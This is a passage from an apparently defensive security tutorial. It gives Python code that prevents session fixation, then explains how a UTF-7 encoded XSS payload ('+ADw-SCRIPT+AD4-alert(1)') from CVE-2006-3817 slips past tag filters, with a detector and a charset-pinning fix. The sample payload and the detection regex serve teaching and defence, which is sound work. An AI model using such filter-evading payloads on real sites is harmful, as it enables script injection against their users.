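    login() always issues a new ID so an ID planted through a crafted link can
    never become the authenticated session."""

    def __init__(self, key=SERVER_KEY):
        self.key = key
        self.sessions = {}           # sid -> {"user": name or None}

    def _sign(self, sid):
        return hmac.new(self.key, sid.encode(), hashlib.sha256).hexdigest()

    def new_session(self):
        sid = secrets.token_urlsafe(32)          # 256 bits from the OS CSPRNG
        self.sessions[sid] = {"user": None}
        return sid + "." + self._sign(sid)

    def _lookup(self, cookie):
        """Return (sid, session) for a well-formed, correctly signed cookie
        that names a live session; (None, None) otherwise."""
        sid, _, mac = (cookie or "").rpartition(".")
        if not sid or not hmac.compare_digest(mac, self._sign(sid)):
            return None, None
        return sid, self.sessions.get(sid)

    def login(self, cookie, username, credentials_ok):
        """On success return a new cookie bound to username; the presented
        session, whether genuine or planted, is dropped rather than upgraded."""
        if not credentials_ok:
            return None
        old_sid, _ = self._lookup(cookie)
        self.sessions.pop(old_sid, None)
        fresh_cookie = self.new_session()
        self.sessions[fresh_cookie.rpartition(".")[0]]["user"] = username
        return fresh_cookie

    def current_user(self, cookie):
        _, session = self._lookup(cookie)
        return session["user"] if session else None
```

The HMAC stops a client from minting or editing a cookie, but it is the server-side map that holds the identity: even a correctly signed cookie for a session that was dropped at login resolves to nothing, which is what defeats fixation.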
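The GroupWise WebAccess row (CVE-2006-3817) is worth a closer look because the payload contains no `<` or `>` at all: in UTF-7, `+ADw-` is the shift sequence for `<` and `+AD4-` for `>`, so a filter that strips tags from the raw bytes sees nothing, while a browser that decides the page is UTF-7 renders `<SCRIPT>`. The following added example (not Novell's code; the message body and function names are constructed) decodes the sequence with Python's own `utf-7` codec, flags bodies that only become script under UTF-7, and shows the output-side fix, which is to pin the document charset so the browser never guesses.

```python
import html
import re

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

# Constructed sample message body; it contains no literal angle brackets.
SAMPLE_BODY = "Hello+ACE- +ADw-SCRIPT+AD4-alert(1)+ADw-/SCRIPT+AD4-"


def decode_as_utf7(text):
    """What a browser does once it treats the page as charset=utf-7:
    '+...-' runs are modified base64 of UTF-16BE code units."""
    return text.encode("ascii").decode("utf-7")


def hides_script_in_utf7(text):
    """True when the text carries a literal <script>, or carries none but
    decodes to one under UTF-7. Non-ASCII input or a malformed shift
    sequence cannot be UTF-7, so both simply yield False."""
    if SCRIPT_TAG.search(text):
        return True
    try:
        return SCRIPT_TAG.search(decode_as_utf7(text)) is not None
    except (UnicodeEncodeError, UnicodeDecodeError):
        return False


def render_message(body):
    """Output-side fix: declare the charset explicitly and escape the body.
    Under a declared UTF-8 the bytes '+ADw-' stay five harmless characters,
    so no UTF-7 sniffing can turn them into a tag."""
    return ('<!DOCTYPE html><html><head><meta charset="utf-8"></head>'
            '<body><pre>' + html.escape(body, quote=True) + '</pre></body></html>')
```

The detector is a useful gate for mail that will be displayed in a browser, but it is the explicit charset (in the HTTP `Content-Type` header as well as the `<meta>` tag) that actually removes the ambiguity; escaping alone does not, because there is nothing to escape in the raw text.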